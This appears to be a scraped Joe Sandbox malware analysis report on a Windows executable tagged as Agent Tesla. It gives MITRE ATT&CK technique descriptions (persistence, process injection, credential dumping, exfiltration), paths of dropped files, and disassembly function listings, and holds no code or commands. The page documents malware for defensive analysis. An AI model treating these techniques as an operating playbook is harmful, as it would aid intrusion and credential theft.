Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rendel#U00e9s_1023200000000000305.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll

C:\Users\user\AppData\Local\Temp\nsr3832.tmp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\Inagglutinability.fug

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\Indbruddene.Obd

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\bingy.uda

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\molge.gos

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\overissued.rei

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\ramessid.gla

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\unsingularly\Udredning\Ambilevous\triaxiality.gen

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
rendel#U00e9s_1023200000000000305.exe

Function 00403640 Relevance: 89.7, APIs: 33, Strings: 18, Instructions: 450
stringfilecomCOMMON

Function 00405D74 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Function 004040C5 Relevance: 61.6, APIs: 34, Strings: 1, Instructions: 357
windowstringCOMMON

Function 00403D17 Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215
stringregistryCOMMON

Function 004030D0 Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 204
memoryCOMMON

Function 004066A5 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 196
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004069C5 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Function 00403479 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 101
COMMON

Function 00405B99 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39
COMMON

Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84
registryCOMMON

Function 6FC61817 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Function 0040248A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Function 00406536 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
registryCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server.
Tactics:	Exfiltration
Data Sources:	Application Log: Application Log Content, Cloud Storage: Cloud Storage Access, Command: Command Execution, File: File Access, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre